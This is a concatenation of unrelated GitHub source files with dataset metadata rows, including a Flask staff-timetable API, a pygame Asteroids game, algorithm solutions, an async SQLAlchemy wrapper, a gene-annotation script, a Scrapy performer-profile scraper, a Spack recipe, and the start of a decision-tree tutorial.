| Aasthaengg/IBMdataset | Python_codes/p02609/s532378622.py | s532378622.py | py | 699 | python | en | code | 0 | github-code | 90 |
7508580685 | from flask import Blueprint, request, jsonify, make_response, session
from sqlalchemy.orm import load_only
from ..student.models import *
from ..student.types import *
from ..student import util
staff = Blueprint("staff", __name__)
# API: staff-profile dashboard page
@staff.route("<variable>", methods=["GET"])
@util.staff_login_required
def staff_profile(variable):
    """Return the dashboard profile for the staff member with this id.

    Stores the staff id in the session; get_staff_time_table reads (and
    pops) it on the follow-up timetable request.
    NOTE(review): the id comes straight from the URL — presumably
    util.staff_login_required guards against impersonation; confirm.
    """
    session['staff_id'] = variable
    db_val = db.session.query(Staff).filter(Staff.staff_id_no == variable).all()
    staff_schema = StaffDashboardProfileSchema(many=True)
    post_json = staff_schema.dump(db_val)
    return jsonify({"data": post_json})
@staff.route("getTimeTable/<staff_id>", methods=["GET"])
@util.staff_login_required
def get_staff_time_table(staff_id):
    """Return the weekly timetable for all courses taught by this staff id."""
    # region professor timetable
    # Debug trace of the session id set by staff_profile.
    if 'staff_id' in session:
        print("SESSION EXISTS")
        print(session["staff_id"])
    # Resolve the external staff id to the internal primary key only.
    staff = db.session.query(Staff).filter(Staff.staff_id_no == staff_id).options(load_only("id")).first()
    # Ids of all courses assigned to this staff member.
    staff_courses = [r[0] for r in db.session.query(Course)
                     .filter(Course.staff_id == staff.id).values("id")
                     ]
    # Schedule rows (period/day/times/course code) for those courses.
    staff_time_table = (db.session.query(Schedule,Course)
                        .join(Course, Schedule.courses)
                        .filter(Course.id.in_(staff_courses)).values("period","day","start_time","end_time","course_code"))
    schd_schema = StaffScheduleSchema(many=True)
    post_json = schd_schema.dump(staff_time_table)
    print(post_json)
    # One-shot session value: consumed here, absent afterwards.
    session.pop('staff_id', None)
    return jsonify({"data": post_json})
    # endregion
@staff.route("check_students", methods=["GET"])
@util.staff_login_required
def check_student_status():
    """Stub endpoint for checking student status (not implemented).

    NOTE(review): currently returns the literal string "jsonify()" with a
    200 status — placeholder body, presumably to be replaced.
    """
    # security framework will first check
    # if the user is Staff or not
    return make_response("jsonify()", 200)
| AnishTiwari/Attendance | attendancesystembackend/attendancesystem/attendancesystem/attendancesystem/staff/views.py | views.py | py | 1,802 | python | en | code | 0 | github-code | 90 |
72115927978 | import pygame
from pygame.locals import *
import math
import random
pygame.init()
# Module-level resources and window-size constants shared by all sprites.
default_font = pygame.font.get_default_font()
font16 = pygame.font.Font(default_font, 16)
clock = pygame.time.Clock()
screen_width = 800
screen_height = 600
class Player(pygame.sprite.Sprite):
    """Triangle sprite controlled with the arrow keys.

    Up moves along the current heading; left/right rotate in 5-degree steps.
    """
    def __init__(self):
        # self.image = pygame.Surface((50, 50))
        # self.image.fill((255, 255, 255))
        super().__init__()
        self.image = pygame.image.load('./plain-triangle.png')
        self.image = pygame.transform.scale(self.image, (25, 40))
        self.rect = self.image.get_rect()
        # Start at the center of the screen.
        self.rect.x = screen_width // 2
        self.rect.y = screen_height // 2
        # Pre-rotated copy of the sprite, refreshed whenever rotation changes.
        self.rotated_image = self.image.copy()
        self.rotation = 0
        self.movement_speed = 5
    def update(self, pressed_keys):
        """Apply one frame of input: move forward and/or rotate by 5 degrees."""
        if pressed_keys[K_UP]:
            # Heading 0 points up; the displacement is subtracted below.
            new_x = self.movement_speed * math.sin(math.radians(self.rotation))
            new_y = self.movement_speed * math.cos(math.radians(self.rotation))
            # Skip the whole move if it would leave the screen on either axis.
            if self.rect.x - new_x <= -5 or self.rect.x - new_x >= screen_width - 5:
                return
            if self.rect.y - new_y <= -5 or self.rect.y - new_y >= screen_height - 5:
                return
            self.rect.move_ip(-new_x, -new_y)
        if pressed_keys[K_RIGHT]:
            self.rotation = (self.rotation - 5) % 360
            self.rotated_image = pygame.transform.rotate(self.image.copy(), self.rotation)
        if pressed_keys[K_LEFT]:
            self.rotation = (self.rotation + 5) % 360
            self.rotated_image = pygame.transform.rotate(self.image.copy(), self.rotation)
    def get_center(self):
        # 25x40 matches the sprite size set by transform.scale in __init__.
        return self.rect.x + 0.5 * 25, self.rect.y + 0.5 * 40
class Bullet(pygame.sprite.Sprite):
    """Small black square projectile that travels along a fixed heading."""

    def __init__(self, initial_pos, angle):
        """Spawn the bullet at `initial_pos`, heading `angle` degrees."""
        super().__init__()
        surface = pygame.Surface((5, 5))
        surface.fill((0, 0, 0))
        self.image = surface
        self.rect = surface.get_rect()
        self.rect.x, self.rect.y = initial_pos[0], initial_pos[1]
        self.angle = angle
        self.movement_speed = 8

    def update(self):
        """Advance one step along the heading; despawn once off-screen."""
        heading = math.radians(self.angle)
        dx = self.movement_speed * math.sin(heading)
        dy = self.movement_speed * math.cos(heading)
        self.rect.move_ip(-dx, -dy)
        off_screen = self.rect.x > 800 or self.rect.y < 0
        if off_screen:
            self.kill()
class Asteroid(pygame.sprite.Sprite):
    """Rock that spawns off-screen and drifts toward the screen center.

    `health` is both the number of hits it takes and the sprite size.
    """
    def __init__(self, position, health=4):
        super().__init__()
        self.health = health
        self.image = pygame.image.load('./asteroid.png')
        size = self.health_to_dimensions()
        self.image = pygame.transform.scale(self.image, size)
        self.rect = self.image.get_rect()
        self.rect.x = position[0]
        self.rect.y = position[1]
        # Unit vector pointing from the spawn position toward screen center.
        direction_x = (screen_width // 2 - position[0])
        direction_y = (screen_height // 2 - position[1])
        magnitude = math.sqrt((direction_x ** 2) + (direction_y ** 2))
        # Guard against division by zero when spawned exactly at the center.
        magnitude = 1 if magnitude == 0 else magnitude
        self.direction = (direction_x / magnitude, direction_y / magnitude)
        self.movement_speed = 4
    def health_to_dimensions(self):
        """Return the sprite size (width, height) for the current health.

        Generalized from a hard-coded 1..5 table (20x20 up to 60x60) to the
        equivalent linear rule 10 + 10 * health. The old table silently
        returned None for any other health value, which then crashed in
        pygame.transform.scale; the formula handles any positive health.
        """
        side = 10 + 10 * self.health
        return side, side
    def update(self):
        """Drift one step toward the screen center."""
        self.rect.move_ip(self.direction[0] * self.movement_speed,
                          self.direction[1] * self.movement_speed)
    def hit_by_bullet(self):
        """Lose one health point; shrink, or despawn at zero health."""
        self.health = self.health - 1
        if self.health == 0:
            self.kill()
            return
        size = self.health_to_dimensions()
        # NOTE(review): rescales the already-scaled image rather than the
        # original asset, so image quality degrades with each hit — confirm
        # this is intended.
        self.image = pygame.transform.scale(self.image, size)
def get_new_random_asteroid_pos():
    """Pick a random spawn point for a new asteroid.

    Each axis independently lands in one of three zones: just past the far
    edge, just before the near edge, or at an integer fraction of the
    screen extent.  RNG draw order matches the previous implementation
    (both zones first, then both coordinates) for seed reproducibility.
    """
    zone_x = random.randint(0, 2)
    zone_y = random.randint(0, 2)
    def pick(zone, extent):
        # zone 1: up to 100px beyond the far edge; zone 2: up to 100px
        # before the near edge; zone 0: somewhere along the visible extent.
        if zone == 1:
            return random.randint(extent, extent + 100)
        if zone == 2:
            return random.randint(-100, 0)
        return extent // random.randint(1, 5)
    return pick(zone_x, screen_width), pick(zone_y, screen_height)
# Main display surface; everything is drawn here and flipped once per frame.
screen = pygame.display.set_mode((800, 600))
def game_loop():
    """Run one full game session at 30 FPS; returns when the player is hit."""
    # Custom timer event: spawn a new asteroid every 2000 ms.
    ADD_ASTEROID = pygame.USEREVENT + 1
    pygame.time.set_timer(ADD_ASTEROID, 2000)
    player = Player()
    bullets = pygame.sprite.Group()
    asteroids = pygame.sprite.Group()
    running = True
    # TODO: make a limit on asteroids
    player_points = 0
    while running:
        for event in pygame.event.get():
            if event.type == QUIT:
                pygame.quit()
                exit(0)
            elif event.type == KEYDOWN:
                if event.key == K_SPACE:
                    # Fire one bullet per key *press* (KEYDOWN, not held key)
                    # from the ship's centre along its current heading.
                    pos = player.get_center()
                    angle = player.rotation
                    bullet = Bullet(pos, angle)
                    bullets.add(bullet)
            elif event.type == ADD_ASTEROID:
                rand_x, rand_y = get_new_random_asteroid_pos()
                asteroid = Asteroid((rand_x, rand_y), health=random.randint(1, 5))
                asteroids.add(asteroid)
        pressed_keys = pygame.key.get_pressed()
        player.update(pressed_keys)
        # Bullets are consumed on impact (first True kills the bullet); each
        # asteroid a bullet touched shrinks one step and scores one point.
        for _, asteroid_list in pygame.sprite.groupcollide(bullets, asteroids, True, False).items():
            for asteroid in asteroid_list:
                asteroid.hit_by_bullet()
                player_points = player_points + 1
        if pygame.sprite.spritecollideany(player, asteroids):
            running = False  # player collided with a rock: end this session
        # Redraw the frame: background, bullets, asteroids, score HUD, ship.
        screen.fill((255, 255, 255))
        for bullet in bullets:
            bullet.update()
            screen.blit(bullet.image, bullet.rect)
        for asteroid in asteroids:
            asteroid.update()
            screen.blit(asteroid.image, asteroid.rect)
        text = font16.render('Player score {}'.format(player_points), True, (0, 0, 0), None)
        screen.blit(text, (10, 550))
        screen.blit(player.rotated_image, player.rect)
        pygame.display.flip()
        clock.tick(30)
def replay_screen():
    """Show the game-over prompt until the player decides.

    Returns False when SPACE is pressed (meaning: play again); exits the
    process on a window-close event.
    """
    prompt = font16.render("Game over - press space to start over", True, (0, 0, 0), None)
    prompt_rect = prompt.get_rect()
    prompt_rect.center = (screen_width // 2, screen_height // 2)
    while True:
        for event in pygame.event.get():
            if event.type == QUIT:
                exit(0)
            if event.type == KEYDOWN and event.key == K_SPACE:
                return False
        # Repaint the prompt every frame so the window stays responsive.
        screen.fill((255, 255, 255))
        screen.blit(prompt, prompt_rect)
        pygame.display.flip()
# Keep starting new sessions until the player declines on the replay screen.
game_done = False
while not game_done:
    game_loop()
game_done = replay_screen() | BrandtRobert/PythonCrashCourse | Asteroids/asteroids.py | asteroids.py | py | 7,122 | python | en | code | 0 | github-code | 90 |
5599272334 | import sys
def circle_area():
    """Count planar regions formed by N circles centred on a line
    (appears to solve BOJ 10000, "circle regions").

    Answer = N + 1 + (number of fully-connected chains of tangent circles),
    since each closed chain of touching endpoints encloses one extra region.
    """
    # Read input: each circle contributes a left and a right endpoint on the line.
    N = int(sys.stdin.readline())
    points = [None] * (2 * N)
    for i in range(N):
        center, radius = list(map(int, sys.stdin.readline().split()))
        points[2*i] = (center - radius, 'l') # left point
        points[2*i+1] = (center + radius, 'r') # right point
    # Sort by x ascending; for equal x an 'r' endpoint sorts before an 'l'
    # endpoint (key is (-x, tag) with reverse=True).
    points.sort(key=lambda x: (-x[0], x[1]), reverse=True)
    # Scan endpoints with a stack, counting closed chains.
    cnt = 0
    stack = []
    for i in range(2 * N):
        # Two consecutive 'r' endpoints mean a nested group just closed:
        # pop backwards until two consecutive 'l' endpoints are found,
        # verifying every l/r junction touches (equal x) along the way.
        if points[i][1] =='r' and stack[-1][1] == 'r':
            is_connected = True
            curr = stack.pop()
            # Chain is broken if the first junction's x-coordinates differ.
            if points[i][0] != curr[0]:
                is_connected = False
            # Pop until two consecutive 'l' endpoints, checking each junction.
            while not(curr[1] == 'l' and stack[-1][1] == 'l'):
                if curr[1] == 'l' and curr[0] != stack[-1][0]:
                    is_connected = False
                curr = stack.pop()
            # Chain is broken if the final junction's x-coordinates differ.
            if curr[1] == 'l' and curr[0] != stack[-1][0]:
                is_connected = False
            # A fully tangent chain closes exactly one extra region.
            if is_connected:
                cnt += 1
        stack.append(points[i])
    return N + 1 + cnt
print(circle_area()) | jinhyung-noh/algorithm-ps | BaekJoon/10000_원영역.py | 10000_원영역.py | py | 1,597 | python | ko | code | 0 | github-code | 90 |
def isPossible(limit, nDays, mChapters, times):
    """Greedy feasibility check: can `times` be split into at most `nDays`
    contiguous groups with every group's sum <= `limit`?

    (`mChapters` is unused but kept for interface compatibility.)
    """
    days_used = 1
    current_load = 0
    for duration in times:
        if duration > limit:
            return False  # one chapter alone already exceeds the cap
        if current_load + duration > limit:
            # Start a new day holding only this chapter.
            days_used += 1
            current_load = duration
        else:
            current_load += duration
    return days_used <= nDays
def ayushGivesNinjatest(n, m, time):
    """Binary-search the smallest daily time cap that lets all `m` chapter
    durations in `time` be covered within at most `n` days (the classic
    book-allocation problem)."""
    lo, hi = min(time), sum(time)
    while lo <= hi:
        candidate = (lo + hi) // 2
        if isPossible(candidate, n, m, time):
            hi = candidate - 1  # feasible: try a tighter cap
        else:
            lo = candidate + 1  # infeasible: the cap must grow
    return lo
| magdumsuraj07/data-structures-algorithms | questions/striever_SDE_sheet/67_allocate_minimum_number_of_pages.py | 67_allocate_minimum_number_of_pages.py | py | 624 | python | en | code | 0 | github-code | 90 |
9688161173 | from typing import Sequence
from dataclasses import dataclass
from datetime import datetime
from sqlalchemy import select
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import AsyncSession
from utils.db_api.base import Base
from utils.db_api.models import Users, Projects
class Database:
    """Async wrapper around an aiosqlite-backed SQLAlchemy session factory."""
    async def load(self) -> None:
        """Create the engine and all tables, then keep a session factory on self.

        Must be awaited once before any other method is used.
        (Return annotation corrected: this method returns None.)
        """
        engine = create_async_engine(
            "sqlite+aiosqlite:///database.db",
            future=True
        )
        async with engine.begin() as conn:
            await conn.run_sync(Base.metadata.create_all)
        async_sessionmaker = sessionmaker(
            engine, expire_on_commit=False, class_=AsyncSession
        )
        self.async_session = async_sessionmaker
    # ---Users---
    async def reg_user(self, user_id: str, username: str, first_name: str):
        """Insert or update (merge) a Users row keyed by user_id."""
        async with self.async_session() as session:
            session: AsyncSession
            await session.merge(
                Users(
                    user_id=user_id,
                    username=username,
                    first_name=first_name
                )
            )
            await session.commit()
    async def get_user(self, user_id) -> Users:
        """Fetch one Users row by primary key (None when absent, per Session.get)."""
        async with self.async_session() as session:
            session: AsyncSession
            response = await session.get(Users, user_id)
            return response
    # ---Projects---
    async def reg_project(self, title: str, description: str, demo: str, github: str):
        """Insert or update (merge) a Projects row."""
        async with self.async_session() as session:
            session: AsyncSession
            await session.merge(
                Projects(
                    title=title,
                    description=description,
                    demo=demo,
                    github=github
                )
            )
            await session.commit()
    async def get_all_projects(self) -> Sequence[Projects]:
        """Return every Projects row."""
        async with self.async_session() as session:
            session: AsyncSession
            response = await session.execute(select(Projects))
            return response.scalars().all()
| KarimovMurodilla/about-me-bot | utils/db_api/connection.py | connection.py | py | 2,258 | python | en | code | 0 | github-code | 90 |
43193187255 | import pandas as pd
import numpy as np
def annotate(chr_, start, end):
    """Return (genes, count): symbols from the global gene table whose span
    lies fully inside [start, end] on chromosome chr_.

    Relies on the module-level columns `chrom`, `s_`, `e_` and `name`.
    """
    matches = [
        name[i]
        for i in range(len(chrom))
        if str(chr_) == str(chrom[i])
        and start <= float(s_[i])
        and end >= float(e_[i])
    ]
    return matches, len(matches)
# Load the inferred copy-number profile and attach segment coordinates.
df = pd.read_csv('real/AR/CRC01/inferred_prof.csv', sep = ',')
chr_ = pd.read_csv('real/CNV_data/SegFixed_withFormalName_usedInScience.xls', sep = '\t')
df['CHR'], df['start'], df['end'] = chr_['CHR'], chr_['START'], chr_['END']
# Keep only segments where the two nodes of interest disagree.
df = df[df['node6'] != df['node9']]
df = df[['CHR','start','end', 'node6','node9']]
# Gene reference table used by annotate(); X/Y are recoded as 23/24.
source = pd.read_csv("real/colorectal.csv")
name = source['Gene Symbol']
chrom = source['Chr']
s_ = source['start']
e_ = source['end']
chrom = [23 if x=='X' else x for x in chrom]
chrom = [24 if x=='Y' else x for x in chrom]
selected_chrom = [1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]
gene = []
end = 0
first = 0
# Walk the segments in order, merging runs of adjacent segments (s == end+1)
# into one event; when a run breaks, annotate and print the finished event.
for index, row in df.iterrows():
    chr_, s, e = int(row['CHR'][3:]), int(row['start']), int(row['end'])
    if first == 0:
        c_ = chr_
    if c_ in set(selected_chrom) or chr_ in set(selected_chrom):
        if first == 0:
            # Open the first event.
            start = s
            end = e
        if first == 1:
            if s == end + 1:
                end = e
            else:
                # Run broke: report the finished event and its genes.
                # NOTE(review): c_ is only refreshed in this branch, so a
                # chromosome change inside a contiguous run is not detected
                # — confirm whether that can occur in this data.
                print(c_, start, end)
                out, counter = annotate(c_, start, end)
                print(','.join(out))
                if counter !=0:
                    print('')
                for i in range(0, counter):
                    gene.append(out[i])
                start = s
                end = e
                c_ = chr_
        first = 1
| Androstane/NestedBD | scripts_plots/annotate_gene.py | annotate_gene.py | py | 1,937 | python | en | code | 4 | github-code | 90 |
17937105439 | import bisect
# Read n then 3n integers: parts A, B, C (n values each) from stdin.
n, *lst = map(int, open(0).read().split())
alst = sorted(lst[:n])
blst = lst[n:2*n]
clst = sorted(lst[2*n:])
res = 0
# For every middle element b, multiply (#A strictly below b) by
# (#C strictly above b) and accumulate — counts all triples a < b < c.
for i in blst:
    a = bisect.bisect_left(alst, i)    # elements of A < i
    c = n - bisect.bisect_right(clst, i)  # elements of C > i
    res += a * c
print(res) | Aasthaengg/IBMdataset | Python_codes/p03559/s636243077.py | s636243077.py | py | 245 | python | en | code | 0 | github-code | 90 |
42267550104 | # 문제: 켜져 있는 전구의 밝기 최댓값 구하기
# Problem: maximize total brightness of the lit bulbs.
# Constraints: 1) 1 <= N <= 200000
#              2) each bulb is either off (0) or on (1)
#              3) 1 <= brightness <= 5000
#              4) exactly one contiguous range of bulbs (length >= 1) may be
#                 flipped, and only once
# Approach:  1) Kadane-style running sum of the flip gain: +brightness for an
#               off bulb (it turns on), -brightness for an on bulb
#            2) reset the running sum to 0 whenever it goes negative
#            3) if the best gain is 0 every bulb is already on, so the forced
#               flip loses least on the single dimmest bulb (tot - min)
#            4) otherwise add the best segment gain to the current total
import sys
input = sys.stdin.readline
N = int(input())
bulbs = list(map(int, input().split()))
on_off = list(map(int, input().split()))
# Total brightness of the bulbs that are currently on.
tot = sum([bulbs[i] for i in range(N) if on_off[i]])
ans = 0
maxB = 0
# Step 1: running flip-gain over a contiguous segment ending at i.
for i in range(N):
    if not on_off[i]:
        ans += bulbs[i]
    else:
        ans -= bulbs[i]
    # Step 2: a negative prefix can never help a later segment.
    if ans < 0:
        ans = 0
    maxB = max(maxB, ans)
# Step 3: no beneficial segment exists — flip just the dimmest bulb.
if maxB == 0:
    print(tot - min(bulbs))
# Step 4: apply the best segment's gain.
else:
    print(tot + maxB)
| junhong625/TIL | Algorithm/Baekjoon/Gold/[25634번] 전구 상태 뒤집기.py | [25634번] 전구 상태 뒤집기.py | py | 1,135 | python | ko | code | 2 | github-code | 90 |
44123381190 | #!/usr/bin/python
#----------------- For Part 2 ---------------------
# Function to return an array of summed numbers
def three_meas_window(input):
    """Sum each sliding window of three consecutive measurements.

    Returns a list two elements shorter than the input (empty for inputs of
    fewer than three items).  The parameter name shadows the builtin
    ``input`` but is kept for interface compatibility.
    """
    return [a + b + c for a, b, c in zip(input, input[1:], input[2:])]
#----------------- For Part 1 ---------------------
# Function to return the number of times the depth
# increases
def depth_increase_count(input):
    """Count how many measurements are strictly greater than the previous one.

    Bug fix: the old version used 0 as a "no previous value yet" sentinel,
    so a genuine 0 in the data (this script maps blank input lines to 0)
    silently restarted the comparison and an increase right after a 0 was
    never counted.  A pairwise comparison needs no sentinel and handles
    empty and single-element inputs naturally.
    """
    return sum(1 for prev, cur in zip(input, input[1:]) if cur > prev)
# Open the input file and read into string array
# Open the input file and read it into a list of line strings.
# NOTE(review): the file handle is never closed; a with-block would be safer.
input_file = open('input.txt')
input_text = input_file.read().split('\n')
# Convert to ints; a blank line (typically the trailing newline) becomes 0.
# Future implementation should filter blank lines before this step instead.
input_num = [int( n if n != '' else 0) for n in input_text]
# Part 2 answer: count increases between consecutive 3-measurement windows.
print(depth_increase_count(three_meas_window(input_num))) | Dowscope/Advent-Of-Code | 2021/Day1/day1.py | day1.py | py | 1,140 | python | en | code | 0 | github-code | 90 |
34120220755 | """Overview plots of transcet"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import linregress
from os.path import join
from src import Config
plt.ion()
cf = Config()
savedir = 'reports/jasa/figures'
# Pre-computed transect decomposition: density levels, stable-spice levels,
# the sigma grid, and along-track positions (x_a, metres).
inputed = np.load('data/processed/inputed_decomp.npz')
lvls = inputed['filled_lvls']
stable_lvls = inputed['stable_spice_lvls']
sigma = inputed['sig_lvls']
x_a = inputed['x_a']
# plot sigma, tau
# Alternative transect windows / level selections, kept for convenience:
#min_x = 50
#max_x = 250
#call_lvls = [39, 48, 54]
min_x = 200
max_x = 300
call_lvls = [34, 36, 42, 44]
#min_x = 200
#max_x = 400
#call_lvls = [38, 41, 50]
fig, ax = plt.subplots(figsize=(cf.jasa_1clm, 2))
x_i = x_a < max_x * 1e3
# Black: interpolated isopycnal depths; red: stable-spice depths where valid.
for lbl_i in call_lvls:
    ax.plot(x_a / 1e3, lvls[0, lbl_i, :].T, color='k', linewidth=1)
    plt_height = stable_lvls[0, lbl_i, :]
    plt_inds = plt_height > 1e-5
    ax.plot(x_a[plt_inds] / 1e3, plt_height[plt_inds], color='#be0119', alpha=0.6)
"""
cc0 = ['0.6', '0.4', '0.2']
z_off = [-10, -5, 0]
for zo, c0, lbl_i in zip(z_off, cc0, call_lvls):
    plt_height = stable_lvls[0, lbl_i, :]
    plt_inds = plt_height > 1e-5
    ax.plot(x_a[plt_inds] / 1e3, plt_height[plt_inds], color='#be0119', alpha=0.6)
    ax.plot(x_a / 1e3, lvls[0, lbl_i, :].T, color=c0)
    ax.text(max_x + 3., lvls[0, lbl_i, x_i][-1] + zo,
            f'{sigma[lbl_i]:.2f}', va='center', color=c0)
"""
# Depth axis increases downward; tighten the layout for the 1-column figure.
ax.set_ylim(130, 0)
ax.set_xlim(min_x, max_x)
pos = ax.get_position()
pos.x1 -= 0.07
pos.x0 += 0.10
pos.y1 += 0.08
pos.y0 += 0.06
ax.set_position(pos)
ax.set_ylabel('Depth (m)')
ax.text(max_x - 3., 10, '$\sigma$', va='center')
ax.text(max_x - 3., 30, '(kg/m$^3$)', va='center')
ax.text(min_x - 25., 5, '(a)', bbox=cf.bbox)
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
#ax[0].xaxis.set_ticks_position('bottom')
#ax[0].yaxis.set_ticks_position('left')
fig.savefig(join(savedir, 'sig_tau_interp.png'), dpi=300)
| nedlrichards/tau_decomp | notebooks/isopycnals.py | isopycnals.py | py | 1,891 | python | en | code | 0 | github-code | 90 |
1249407832 | import scrapy
import re
from datetime import datetime
from dateutil.relativedelta import relativedelta
import dateparser
from urllib.parse import urlparse
from tpdb.BasePerformerScraper import BasePerformerScraper
class BellaPassnPerformerSpider(BasePerformerScraper):
    """Performer scraper for the Bella Pass network of sites.

    Changes from the previous revision:
    - removed a dead duplicate ``get_cupsize`` definition (Python keeps only
      the last definition of a name in a class body, so the earlier one —
      which also referenced a nonexistent 'cupsize' selector — never ran);
    - regex patterns are now raw strings, silencing invalid-escape warnings.
    """
    selector_map = {
        'name': '//div[@class="profile-details clear"]/h3/text()',
        'image': '//div[@class="profile-pic"]/img/@src0_1x',
        'birthplace': '//p[@class="mb-1 mt-3"]/a/span/text()',
        'nationality': '//td/li/strong[contains(text(),"Ethnicity")]/../../following-sibling::td/text()',
        'ethnicity': '//td/li/strong[contains(text(),"Ethnicity")]/../../following-sibling::td/text()',
        'eyecolor': '//td/li/strong[contains(text(),"Eye Color")]/../../following-sibling::td/text()',
        'haircolor': '//td/li/strong[contains(text(),"Hair Color")]/../../following-sibling::td/text()',
        'height': '//td/li/strong[contains(text(),"Height")]/../../following-sibling::td/text()',
        'measurements': '//td/li/strong[contains(text(),"Stats")]/../../../td/text()',
        'tattoos': '//td/li/strong[contains(text(),"Tattoos")]/../../../td/text()',
        'piercings': '//td/li/strong[contains(text(),"Piercings")]/../../../td/text()',
        'birthday': '//td/li/strong[contains(text(),"Birthdate")]/../../following-sibling::td/text()',
        'bio': '//div[@class="profile-about"]/p/text()',
        'aliases': '//p[@data-test="p_aliases"]/text()',
        'pagination': '/models/%s/name/',
        'external_id': 'models/(.+).html$'
    }
    name = 'BellaPassPerformer'
    network = 'Bella Pass'
    parent = 'Bella Pass'
    start_urls = [
        'https://alexismonroe.com',
        'https://avadawn.com',
        'https://bellahd.com',
        'https://bellanextdoor.com',
        'https://bryci.com',
        'https://calicarter.com',
        'https://hd19.com',
        'https://hunterleigh.com',
        'https://janafox.com',
        'https://joeperv.com',
        'https://katiebanks.com',
        'https://monroelee.com',
        'https://taliashepard.com',
    ]
    def get_gender(self, response):
        """Every performer on this network is listed as female."""
        return 'Female'
    def get_performers(self, response):
        """Yield a parse request for each performer linked from a listing page."""
        performers = response.xpath('//div[@class="item-portrait"]/a/@href').getall()
        for performer in performers:
            yield scrapy.Request(
                url=self.format_link(response, performer),
                callback=self.parse_performer
            )
    def get_ethnicity(self, response):
        """Ethnicity is the part before the comma in the 'Ethnicity' cell."""
        if 'ethnicity' in self.selector_map:
            ethnicity = self.process_xpath(response, self.get_selector_map('ethnicity')).get()
            if ethnicity:
                if "," in ethnicity:
                    ethnicity = ethnicity.split(",")[0]
                return ethnicity.strip()
        return ''
    def get_nationality(self, response):
        """Nationality is the part after the comma in the 'Ethnicity' cell,
        falling back to the 'Lives In' cell when no comma is present."""
        if 'nationality' in self.selector_map:
            nationality = self.process_xpath(response, self.get_selector_map('nationality')).get()
            if nationality:
                if "," in nationality:
                    nationality = nationality.split(",")[1]
                    return nationality.strip()
            else:
                nationality = response.xpath('//td/li/strong[contains(text(),"Lives In")]/../../following-sibling::td/text()').get()
                if nationality:
                    return nationality.strip()
        return ''
    def get_height(self, response):
        """Convert a feet/inches height string into centimetres ('NNNcm')."""
        if 'height' in self.selector_map:
            height = self.process_xpath(response, self.get_selector_map('height')).get()
            if height:
                str_height = re.findall(r'(\d{1,2})', height)
                if len(str_height):
                    feet = int(str_height[0])
                    if len(str_height) > 1:
                        inches = int(str_height[1])
                    else:
                        inches = 0
                    heightcm = str(round(((feet*12)+inches) * 2.54)) + "cm"
                    return heightcm.strip()
        return ''
    def get_cupsize(self, response):
        """Cup size is the leading token of the 'Stats' measurements string."""
        if 'measurements' in self.selector_map:
            measurements = self.process_xpath(response, self.get_selector_map('measurements')).get()
            if measurements:
                measurements = measurements.replace(" ","").strip()
                measurements = re.search(r'(.*-\d{2}-\d{2})', measurements).group(1)
                if measurements:
                    cupsize = re.search(r'(.*?)-.*', measurements).group(1)
                    if cupsize:
                        return cupsize.upper().strip()
        return ''
    def get_measurements(self, response):
        """Normalized 'XX-YY-ZZ' style measurements from the 'Stats' cell."""
        if 'measurements' in self.selector_map:
            measurements = self.process_xpath(response, self.get_selector_map('measurements')).get()
            if measurements:
                measurements = measurements.replace(" ","").strip()
                measurements = re.search(r'(.*-\d{2}-\d{2})', measurements).group(1)
                if measurements:
                    return measurements.upper().strip()
        return ''
    def get_birthday(self, response):
        """Parse the birthdate cell into an ISO timestamp string."""
        if 'birthday' in self.selector_map:
            birthday = self.process_xpath(response, self.get_selector_map('birthday')).get()
            if birthday:
                checkbirthday = re.search(r'(.*?)\s+(\d+).*(\d{4})', birthday)
                if checkbirthday:
                    if checkbirthday[3]:
                        # A 3-digit day capture means an ordinal suffix got
                        # glued on (e.g. '2nd' matched as '2n'); drop the
                        # leading digit-run artifact before re-assembling.
                        if len(checkbirthday[2]) == 3:
                            tempday = checkbirthday[2]
                            tempday = tempday[1:]
                            birthday = checkbirthday[1] + " " + tempday + ", " + checkbirthday[3]
                return dateparser.parse(birthday.strip()).isoformat()
        return ''
    def get_image(self, response):
        """Absolute profile-image URL (site-relative src joined to the host)."""
        url = urlparse(response.url)
        base = url.scheme + "://" + url.netloc
        if 'image' in self.selector_map:
            image = base + self.process_xpath(response, self.get_selector_map('image')).get()
            if image:
                return image.strip()
        return ''
| SFTEAM/scrapers | performers/networkBellaPassPerformer.py | networkBellaPassPerformer.py | py | 6,541 | python | en | code | null | github-code | 90 |
27092636028 | from spack import *
class Openscenegraph(CMakePackage):
    """OpenSceneGraph is an open source, high performance 3D graphics toolkit
       that's used in a variety of visual simulation applications."""
    homepage = "http://www.openscenegraph.org"
    url = "http://trac.openscenegraph.org/downloads/developer_releases/OpenSceneGraph-3.2.3.zip"
    version('3.2.3', '02ffdad7744c747d8fad0d7babb58427')
    version('3.1.5', '1c90b851b109849c985006486ef59822')
    variant('shared', default=True, description='Builds a shared version of the library')
    depends_on('cmake@2.8.7:', type='build')
    depends_on('qt@4:')
    depends_on('zlib')
    def cmake_args(self):
        """Assemble the CMake arguments for this build.

        Shared/static is driven by the '+shared' variant; zlib paths are
        passed explicitly so CMake picks up Spack's zlib, not the system one.
        """
        spec = self.spec
        shared_status = 'ON' if '+shared' in spec else 'OFF'
        args = [
            '-DDYNAMIC_OPENSCENEGRAPH={0}'.format(shared_status),
            '-DDYNAMIC_OPENTHREADS={0}'.format(shared_status),
            '-DZLIB_INCLUDE_DIR={0}'.format(spec['zlib'].prefix.include),
            '-DZLIB_LIBRARY={0}/libz.{1}'.format(spec['zlib'].prefix.lib,
                                                 dso_suffix),
            '-DBUILD_OSG_APPLICATIONS=OFF',
            '-DOSG_NOTIFY_DISABLED=ON',
            '-DLIB_POSTFIX=',
        ]
        # NOTE: This is necessary in order to allow OpenSceneGraph to compile
        # despite containing a number of implicit bool to int conversions.
        if spec.satisfies('%gcc'):
            args.extend([
                '-DCMAKE_C_FLAGS=-fpermissive',
                '-DCMAKE_CXX_FLAGS=-fpermissive',
            ])
        return args
| matzke1/spack | var/spack/repos/builtin/packages/openscenegraph/package.py | package.py | py | 1,599 | python | en | code | 2 | github-code | 90 |
3967803474 | ###########################################################################
#
#Author:Manali Milind Kulkarni
#Date:28th March 2021
#About: Implementing Decision Tree on Demo Dataset
#Note: This is sytematic code which uses main function,a machine Learning function and starter code
#
###########################################################################
#Required import
from sklearn import tree
###########################################################################
#Helper Function
def MarvellousMl(weight,surface):
